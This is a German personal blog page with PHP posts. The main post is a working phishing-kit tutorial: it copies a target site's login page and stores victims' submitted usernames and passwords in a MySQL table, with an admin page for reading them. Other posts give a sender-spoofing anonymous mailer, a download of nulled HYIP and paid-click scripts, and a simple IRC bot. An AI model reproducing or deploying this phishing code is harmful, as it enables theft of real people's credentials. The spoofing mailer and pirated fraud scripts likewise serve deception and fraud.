Daniel Schröter's Blog » PHP

How to create a Fishing-Page (MySQL)

Daniel — Sat, 07 Jun 2008 16:47:10 +0000

1. Source code von der Webseite nehmen, welcher an euren Browser geschickt wurde. (Rechtsklick -> Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern.
2. Nun haben wir ein Abbild von der Page
3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet.

Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt:

index.html

das ist der Source der kopierten Seite.

send.php

^?View Code PHP

< ?php
include ("sqlconnect.php");
$username = $_POST["username"];
$userpasswort = $_POST["passwort"];
$eintrag = "INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')";
$eintragen = mysql_query($eintrag);
?>

Ihr ersetzt “http://blablub.com” mit der Seite des “Opfers” (nachdem die Daten abgeschickt wurden). Dort wird er Quasi nach erfolgreicher Eingabe umgeleitet.

sqlconnect.php

^?View Code PHP

< ?php
$server = "localhost";
$user = "root";
$pwd = "password";
$database = "data";
mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich");
mysql_select_db("$database") or die ("Die Datenbank existiert nicht");
?>

“localhost” wird mit dem MySQL-Datenbankserver ersetzt, diesen bekommt ihr von eurem Free-Webspace Anbieter.
“root” wird mit dem MySQL-Benutzernamen ersetzt. (Gibts auch von Anbieter…)
“password” wird mit dem MySQL-Password ersetzt….
“data” ist mit dem Datenbanknamen zu überschreiben… (Ebenfalls Webspaceanbieter)

make.php

^?View Code PHP

< ?php
include ("sqlconnect.php");
$sql = 'CREATE TABLE `base` ('
. ' `user` VARCHAR(255) NOT NULL, '
. ' `pwd` VARCHAR(255) NOT NULL'
. ' )'
. ' ENGINE = myisam;';
$eintragen = mysql_query($sql);
echo "Tabelle erstellt! Diese Datei kann nun gelöscht werden. (make.php)";
?>

admin.php

^?View Code PHP

< ?php
include ("sqlconnect.php");
$ident = $_POST["pw"];
if (isset($ident))
{
if ($ident=="deinpw")
{
 
$abfrage = "SELECT * FROM base";
$ergebnis = mysql_query($abfrage);
while($row = mysql_fetch_object($ergebnis))
{
echo "ID: $row->user";
echo "   ";
echo "PW: $row->pwd";
echo "
";
}
}
else
{
echo "Passwort falsch! Probiers nochmal...";
}
}
else
{
echo "";
echo "";
echo "";
}
?>

anstatt “deinpw” gebt ihr ein belibiges Passwort ein.

Als nächstes ladet ihr die 5 Dateien auf eurem Webspace hoch und führt die “make.php” im Browser aus. Eure Seite könnt ihr über die index.html aufrufen. Die eingetragenen Daten des “Opfers” sind in der admin.php zu finden…

Folgende Files müssten dann auf eurem Webspace zu finden sein wenn ihr alles richtig gemacht habt.

index.html
send.php
sqlconnect.php
make.php
admin.php

Anonymer PHP Mailer

Daniel — Sun, 16 Mar 2008 11:12:54 +0000

Folgenden code in eine .php file schreiben, die definierten Felder editieren und auf ein Public Webhoster uploaden (z.B. lycos)

< ?php
$from_name = "Anonymous";
$from_email = "anonymous@sender-domain.com";
$to_email = "target@somedomain.com";
$subject = "Mail Subject";
$message = "Your text ....";

$headers = "From: ".$from_name." <".$from_email.">\r\n”;
$headers .= “Reply-To: “.$from_email.”\r\n”;

mail($to_email, $subject, $message, $headers, “-f”.$from_email);

echo “Mail Sent.”;
?>

und im Webbrowser ausführen

Diverse PHP Scripts um Geld zu verdienen

Daniel — Sun, 16 Mar 2008 11:00:31 +0000

+ High Yield Investment Programfore-Moneyv 2.5 RL[15976]
+ 2 Autosurf Exchange PHP Script
+ 3 Traffic Exchange PHP Script
+ 4 iPaid4Clicks
+ 7 iPaidEmail
+ 18 PHP Affiliate Script
+ autohits
+ autohits_exchange
+ AUTOHITSPRO_SILVER_V30_NULL
+ autosurf
+ autosurf PC
+ Cashcrusader 1.98
+ createyourowngetpaid
+ Dieselworks
+ E-Gold Games Hyip
+ eGold Roulette Game (Nulled)
+ Horse Race game PHP NULL DGT
+ HYIP Manager 3.1 RML
+ Million Dollar Script v1.1.3
+ paidemailscript
+ PHP Auto Paid Daily v1.5
+ PHP-Paidmail v1.00 Nullified
+ randomizer
+ STORMPAYPPO RANDOMIZER v1.4
+ Super Clix Pro
+ Tap.Scripts.Randomizer.Datecode.20040704.PHP-iND
+ trafficexchang
Download: blackhat.me.uk_money_scripts.zip

PHP IRC Bot

Daniel — Sun, 16 Mar 2008 00:35:28 +0000

Folgendes Script in eine .php File kopieren und auf einen beliebigen Webserver ausführen. Das Browser Fenster muss aber geöffnet bleiben, damit es funktioniert!

Um den Bot in ein Channel joinen zu lassen muss der cmd “/msg myOwnBot !join #channel” im quakenet geschrieben werden. Dann sollte er den Definierten Channel beitreten.

Download: hier

Man kann auch seine eigenden Commands erstellen, hier ein paar Beispiele:

case ‘:!hello’:
$this->send_data( ‘PRIVMSG’, $ex[2].’ :Hello! Im your PHP-IRC-Bot’ );
break;

case ‘:!kick’:
$this->send_data( ‘KICK’, $ex[2].’ ‘.$ex[4] );
break;

case ‘:!part’:
$this->send_data(‘PART’, $ex[4]);
break;